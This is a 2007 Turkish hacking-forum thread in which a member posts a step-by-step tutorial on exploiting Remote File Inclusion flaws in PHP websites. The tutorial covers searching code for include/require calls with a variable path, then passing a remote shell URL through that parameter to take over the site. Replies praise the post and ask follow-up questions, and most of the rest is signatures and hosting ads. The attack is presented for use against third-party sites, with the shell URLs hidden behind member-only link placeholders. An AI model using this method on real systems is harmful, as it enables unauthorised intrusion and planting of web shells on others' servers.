The-Sabotage Cyber Hackers And Security Platform  

Portal Forum Kimler Online Bugünki Mesajlar Forumları Okundu Kabul Et
Geri git   The-Sabotage Cyber Hackers And Security Platform > || TSH || Hacking & Security > Web - Server Hacking & Security

Web - Server Hacking & Security Web Hacking Hakkında Bilmek istediğiniz Herşey,koruma yolları ve güncel açıklar ile ilgili Bölümümüz

Cevapla
 
LinkBack Seçenekler Stil
Alt 05-30-2007, 13:56   #1 (permalink)
HENRYAPO
MaReŞaL
 
HENRYAPO - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Mesajlar: 580
Arrow Sitelerde RFI Açığını Kendiniz Bulun !!

S.A SaboTage Halkı !

Bugun size Sitelerde Nasıl RFI acığı bulursunuz , nasıl yaparsınız onu Anlatacağım

Kardesler Şimdi Diyelimki Bir Sitedesiniz ! { Bundan Sonrası Uygulamalı Anlatım }

Sitemiz Bu : [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

Şimdi ben bu siteye Girdim Arıyorım ve /admin/ Klasör üne girdim ve Ordan Rasgele user_typesh.php acıyorum ve içinde arama yapıyorum ;

include
include_once
require
require_once

Bu kodları arama yapıyorsunuz ; [ Başka Kodlarda Var ]

Ben include Kodunu Arama yaptım ve karsıma ;

include("$include_path/FastTemplate.php3")

Böle Birsey cıktı Şimdi Ne Yapıcaksınız ;
Bakın ;

$include_path

kısmını gorduysenız yani " $ " Bu işaretden sonra gelen kelımeyı Alıcaksınız . Eğer O işaret yoksa boşuna uğrasmayın olmas . Nese Yani " include_path " Aldık Ne yapıcaz , Hemen Sitemizi Alıyoruz ; Sitemiz Neydi ;

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] Buydu ,Peki Uzantısı eydi /admin/user_typesh.php

Hemen Birlestiriyoruz Yani ;

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

İşte Bu Bunun Sonuna Yukardakı Anlattığım Acığı Ekliyorsunuz !
yani bole ;

user_typesh.php?include_path=

Bakın Nasıl Yaptım !

user_typesh.php den sonra " ? " işareti ve Kodumu yazdım sonra kodumu yazdıktan sonra " = " işareti koydum

" = " işaretinden sonra Shell imizi Oraya Koyuyoruz Ve ENTER lıyoruz :)

Yani Böle

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]?

{ Shell in Sonuna Soru İşareti Koymayı Unutmayın }

Bakın Siteye Shell imizi Soktuk Şimdi istediğinizi Yapın Site Sizin

The-SaboTage.Org
HENRYAPO ...

{ Bu Anlatımı Başka Yerde Bulamassınız }
__________________
--==+=============================================== =================================+==--
--==+ HENRYAPO +==--
--==+=============================================== =================================+==--
--==+ The-Sabotage Cyber Hackers And Security Platform +==--
--==+=============================================== =================================+==--
Profdizayn İnternet Hizmetleri

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

--> En Kalite Hızlı Sunucular
--> Domain 10 YTL
--> Uygun Fiyatlar...
--> Joomla Uyumlu Sunucular...

Hosting Seçiminizde Özel ve Gold Paket Seçin Karlı Cıkın..

vbulletin, Joomla, Smf, WordPress vs. Bunun Gibi Hazır Sistem Kurulumu Bizden..

%100 Güvenli Sunucular - Full Destek & Hacklenmeme Garantisi...

Daha Önce Kim size Hacklenmeme Garantisi verdi? Biz veriyoruz eğerki bizden kaynaklanan Hata Yüzünden Web sitenize birsey Olursa Ücret İyadesi Ediyoruz...

Full Güvenlikli Bir Web Sitesi İstiyorsanız Bizi Tercih EDİN !

Hiç Birimiz Sabah Kalktığında Sitesinde Siyah bir Sayfa Görmek İstemez Dimi?

The-SaboTage.Org Tarafından Onaylıdır...

Tıklayın Lütfen ;

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]
HENRYAPO isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 05-30-2007, 14:10   #2 (permalink)
lanet_zebani
MaReŞaL
 
lanet_zebani - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Mesajlar: 318
Tek kalimeyle Harika bi anlatım olmuş Mareşalim. Eline sağlık.
__________________
\\\|///
\\ - - //
( @ @ )
-----------oOOo--(_)-oOOo------------

[ The-Sabotage HaCKeRs]
[ [Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] ]
[ T-S-H ]

------------ooooO-----Ooooo------------
( --)---------( --)
\ -(---------)- /
\_)-------(_/










Beğendiğiniz Paylaşımların Hakkını verelim Arkadaşlar.

Emeğe Saygınızı
- Tşkler
- Güzel Paylaşım
- Eline Sağlık veya Klavyene Sağlık
- Devamınıda Bekleriz

gibi mesajlar yazma yerine;
TEŞEKKÜR BUTONUna
tıklamanız Yeterli. Burda Üyenin Yazsığı Msj veya Açtığı Konu sayısı Herzaman II. Planda dır. Öncelik Yaptığınız Teşekkür veya Aldığınız Teşekkür sayınızdır.
Harcanan Emeklere Saygı Gösterin Lütfen
lanet_zebani isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 05-30-2007, 14:15   #3 (permalink)
HENRYAPO
MaReŞaL
 
HENRYAPO - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Mesajlar: 580
eywallah Maresalim Saolasın
__________________
--==+=============================================== =================================+==--
--==+ HENRYAPO +==--
--==+=============================================== =================================+==--
--==+ The-Sabotage Cyber Hackers And Security Platform +==--
--==+=============================================== =================================+==--
Profdizayn İnternet Hizmetleri

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

--> En Kalite Hızlı Sunucular
--> Domain 10 YTL
--> Uygun Fiyatlar...
--> Joomla Uyumlu Sunucular...

Hosting Seçiminizde Özel ve Gold Paket Seçin Karlı Cıkın..

vbulletin, Joomla, Smf, WordPress vs. Bunun Gibi Hazır Sistem Kurulumu Bizden..

%100 Güvenli Sunucular - Full Destek & Hacklenmeme Garantisi...

Daha Önce Kim size Hacklenmeme Garantisi verdi? Biz veriyoruz eğerki bizden kaynaklanan Hata Yüzünden Web sitenize birsey Olursa Ücret İyadesi Ediyoruz...

Full Güvenlikli Bir Web Sitesi İstiyorsanız Bizi Tercih EDİN !

Hiç Birimiz Sabah Kalktığında Sitesinde Siyah bir Sayfa Görmek İstemez Dimi?

The-SaboTage.Org Tarafından Onaylıdır...

Tıklayın Lütfen ;

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]
HENRYAPO isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 05-30-2007, 19:08   #4 (permalink)
Pisikopat-Fare
Teğmen
 
Pisikopat-Fare - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: May 2007
Mesajlar: 57
ben tam olark anlayamadım :S /admin/ klasorune giriyosun şifre istiyo daha aıklayıcı bi şekilde anlatabilirmisin acaba ?rica etsem?
Pisikopat-Fare isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 05-30-2007, 20:41   #5 (permalink)
SeCReT
Teğmen
 
SeCReT - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Mesajlar: 65
mukemmel olmush ama bu anlatıma gore yenı bashlayan arkdashlr anlamaya bılır o yuzden vıdeo cekersen arkdashlar acısından mukemmel olur ama bole de coq gusel
__________________
[T][S][H]
SeCReT isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 05-30-2007, 21:13   #6 (permalink)
HENRYAPO
MaReŞaL
 
HENRYAPO - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Mesajlar: 580
Videosunuda Cekicem Arkadasın soledığı soruya cvp verim , Şimdi Arkadasım ben sadece Nasıl RFI kodu bulursunuz onu gosterdım yani senın diyelim elinde bir elinde bir site kodlaması varsa yani admin.php gibi girersin içine bakarsın bulursan bulursun ! ancak sen bir siteye direk ;

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...] bu sekilde yaparsan olmaz cunku kodlara ulasamazsın o yuzden dediğin sekilde olmaz

He diyelimki bir ftp desın ve istediğin dosyayı arama yaparsın insallah anlamssındır . Halen anlamadıysan daha deteylı acıklama yapabilirim
__________________
--==+=============================================== =================================+==--
--==+ HENRYAPO +==--
--==+=============================================== =================================+==--
--==+ The-Sabotage Cyber Hackers And Security Platform +==--
--==+=============================================== =================================+==--
Profdizayn İnternet Hizmetleri

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

--> En Kalite Hızlı Sunucular
--> Domain 10 YTL
--> Uygun Fiyatlar...
--> Joomla Uyumlu Sunucular...

Hosting Seçiminizde Özel ve Gold Paket Seçin Karlı Cıkın..

vbulletin, Joomla, Smf, WordPress vs. Bunun Gibi Hazır Sistem Kurulumu Bizden..

%100 Güvenli Sunucular - Full Destek & Hacklenmeme Garantisi...

Daha Önce Kim size Hacklenmeme Garantisi verdi? Biz veriyoruz eğerki bizden kaynaklanan Hata Yüzünden Web sitenize birsey Olursa Ücret İyadesi Ediyoruz...

Full Güvenlikli Bir Web Sitesi İstiyorsanız Bizi Tercih EDİN !

Hiç Birimiz Sabah Kalktığında Sitesinde Siyah bir Sayfa Görmek İstemez Dimi?

The-SaboTage.Org Tarafından Onaylıdır...

Tıklayın Lütfen ;

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]
HENRYAPO isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 05-31-2007, 08:08   #7 (permalink)
SeCReT
Teğmen
 
SeCReT - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Mesajlar: 65
konuyu mukemmel anlatmısıssın ama benım anladıgım kadarıyla arkadashın demek ıstedıgı bu admıne gırdıkten sonra neler yapıp da aratacagımız herhalde
orayı
anlamadı :S ellerıne saglık gusel paylaşım
__________________
[T][S][H]
SeCReT isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 05-31-2007, 13:02   #8 (permalink)
Pisikopat-Fare
Teğmen
 
Pisikopat-Fare - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: May 2007
Mesajlar: 57
ben sunu anlamadım :S "Şimdi ben bu siteye Girdim Arıyorım ve /admin/ Klasör üne girdim ve Ordan Rasgele user_typesh.php acıyorum " demişsin- /admin/ kalsörüne nasıl girdin birde herhangi bir sitede ben böle php dosyalarını nasıl bulcm hersitede /admin/ klasoru varmı? şimdiden tesekkur ederm
Pisikopat-Fare isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 05-31-2007, 18:10   #9 (permalink)
HENRYAPO
MaReŞaL
 
HENRYAPO - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Mesajlar: 580
kardes BAK ADMİN KALSORU FALAN HİKAYE anlatmak istediğim kafandan admin klasor unu cıkar , ole bişeye takılma ben sadece nasıl bulucağını gosterdım bunu anla yeter yanı ilerde sen bı sitenın ftp sıne gırersen acarsın ordan bi dosya rfı acığı arasın bu kadar basit o düşünceyiş kafandan cıkar ;

sen rasgele admin klaor une gırersen tabıkıde olmas him bir site kodlarını vermez hepsi zaten html olarak gosterilir :) umarım anlamıssındır :)
__________________
--==+=============================================== =================================+==--
--==+ HENRYAPO +==--
--==+=============================================== =================================+==--
--==+ The-Sabotage Cyber Hackers And Security Platform +==--
--==+=============================================== =================================+==--
Profdizayn İnternet Hizmetleri

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]

--> En Kalite Hızlı Sunucular
--> Domain 10 YTL
--> Uygun Fiyatlar...
--> Joomla Uyumlu Sunucular...

Hosting Seçiminizde Özel ve Gold Paket Seçin Karlı Cıkın..

vbulletin, Joomla, Smf, WordPress vs. Bunun Gibi Hazır Sistem Kurulumu Bizden..

%100 Güvenli Sunucular - Full Destek & Hacklenmeme Garantisi...

Daha Önce Kim size Hacklenmeme Garantisi verdi? Biz veriyoruz eğerki bizden kaynaklanan Hata Yüzünden Web sitenize birsey Olursa Ücret İyadesi Ediyoruz...

Full Güvenlikli Bir Web Sitesi İstiyorsanız Bizi Tercih EDİN !

Hiç Birimiz Sabah Kalktığında Sitesinde Siyah bir Sayfa Görmek İstemez Dimi?

The-SaboTage.Org Tarafından Onaylıdır...

Tıklayın Lütfen ;

[Linkleri görebilmek için üye olmalısınız. Üye olmak için tıklayınız...]
HENRYAPO isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 05-31-2007, 18:23   #10 (permalink)
SeCReT
Teğmen
 
SeCReT - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2007
Mesajlar: 65
yanı kardeşim demek ıstedıgı bunu uygulayabılmen ıcın elınde sıtenın ftp sıfrelerı olması lazım ftp den admın clasorune gırerek aratırsın
__________________
[T][S][H]
SeCReT isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla



Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil

Yetkileriniz
Yeni Mesaj yazma yetkiniz Aktif değil dir.
Mesajlara Cevap verme yetkiniz aktif değil dir.
Eklenti ekleme yetkiniz Aktif değil dir.
Kendi Mesajınızı değiştirme yetkiniz Aktif değildir dir.

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık


Bütün Zaman Ayarları WEZ +3 olarak düzenlenmiştir. Şu Anki Saat: 15:18 .


eXTReMe Tracker
PageRank ?????????

Powered by vBulletin
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
SEO by 3.0.0
The-Sabotage Hacker's
Saldırıya Karşı Güvenlik Devrede
Sitemap
3, 4, 5, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 98, 99, 101, 102, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 135, 136, 137, 140, 141, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251,

Title
The-SaboTage Team* Terörle Mücadele Grup Komutanlığı* Özel Kuvvetler Grup Komutanlığı* Web Tasarım - Grafik Grup Komutanlığı* Personel Daire Başkanlığı* Savunma Grup Komutanlığı* Saldırı ve Operasyon Merkezi* || TSH || Hacking & Security* Hack'e Yeni Başlayanlar & Yardım Bölümü* Web - Server Hacking & Security* Video'lu Hack Anlatımları* Mail Hacking & Security* Pc Hacking & Security* İrc / Chat Hacking Ve Güvenlik* Exploit / Vulnerabilities* Keylogger & Trojan & Virüsler* Security* The-SaboTage Merkez Tanımı* The-SaboTage Duyurular* || TSH || Basında Biz ..* || TSH || Yeni Üyelerimiz ...* || TSH || Banned Users* Webmaster , Dizayn & Tasarım* Webmaster Bölümü* Photoshop & Flash* Google Adsense & Pagerank* Güncel Scriptler* PHP Scriptler* ASP Scriptler* Programlama Dilleri* Visual C.NET ve Visual C++.NET* Visual Basic ve Delphi* ASP ve PHP DiLLeri* Diğer Programlama Dilleri* Bilgisayar, İnternet ve Teknoloji Dünyası* Pc'niz İçin Güzel Programlar* Pc Oyunları* Resimli Program Anlatımı* Donanım & Donanım Sorunları* Bilgisayar Taktikleri & Bilinmeyenler* İşletim Sistemleri* Linux İşletim Sistemi* Windows İşletim Sistemi* İnternet Adresleri ( Bookmark )* Teknoloji Dünyasından Son Haberler* Msn & Yahoo Messenger Dünyası* Crack & Serials* İslam ve İnsan* İslami resimler* İslami Video ve fragmanlar* İslami programlar* Dini Hikayeler , Şiirler , Sohbetler* Dualar ve hadisler* The-SaboTage Cafe* Eğlence / Mizah / Geyik* Romantizm & Duygusallık & Sevgi* Derin Konular; Edebiyat/Felsefe* Tartışma Platformu* Eğitim , Öğretim & E-Kitap* Yerli ve Yabancı Mp3* Türkçe MP3* Yabancı MP3* Dizi Ve Film Müzikleri* Şarkı Sözleri* Yerli ve Yabancı Sinema* Vizyona Girecek Filmler* Türk Filmleri* Yabancı Filmler* Belgesel* Spor Köşesi* Beşiktaş* Fenerbahçe* Galatasaray* Trabzon Spor* Diğer Takımlar* Diğer Spor Haberleri* (Çöp Kutusu)* Çöp Kutusu* TsH United Foreigner Team The Area* Team Başvuru İnceleme Bölümü* Kriptografi (Şifreleme )* Güncel Açıklar* Karargah Destek Grup Komutanlığı* Ar-ge ve Yazılım Geliştirme Grup Komutanlığı* TSH Vip Bölüm (Priv8)* Vip Odası* M.KeMaL ATATüRK KöŞeSi* vbulletin* SMF* WordPress* oScommerce e-Ticaret Sistemi* Diğer* Joomla 1.0.x* Joomla 1.5.x* Joomla! İndir - Kur - Güncelle* Joomla! 1.0.x Resimli Dersler* Joomla! 1.0.x Güvenlik* Joomla! 1.0.x Soru - Cevap* Joomla! 1.0.x Eklenti İndir* Joomla 1.0.x Site Değerlendir* Joomla! 1.0.x SSS* Genel Sistem Soruları* Bileşen - Modül - Bot - Tema Soruları* Kurulumda Gelenler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Güvenlik* Dil - Tercüme Eklentileri* Menü Eklentileri* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim* Uygunlaştırma - SEO - SEF* Form* Forum - Köprü - Entegre* Diğer Eklentiler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Dil - Tercüme Eklentileri* Menü* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim* Uygunlaştırma - SEO - SEF* Form* Forum - Köprü - Entegre* Diğer Eklentiler* Joomla! Kurulum ve Güncelleme* Joomla! 1.5.x Soru - Cevap* Joomla! 1.5.x Tüm Eklentiler* Çeviri Talepleri* Proje Çözüm* Site Değerlendirme* Joomla! 1.5.x SSS* Genel Sistem Soruları* Eklenti Soru - Cevap* Kurulumda Gelenler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Güvenlik* Dil - Tercüme* Menü* Galeri - Ses - Görüntü* e-Ticaret* Dosya Yönetim - Paylaşım* Form Araçları* Forum* Diğer Eklentiler* Haber - Duyuru - İndir* Soru - Cevap* Kurulumda Gelenler* Tema - CSS* Üye Yönetim* Haber - Yorum - İçerik* Güvenlik* Dil - Tercüme*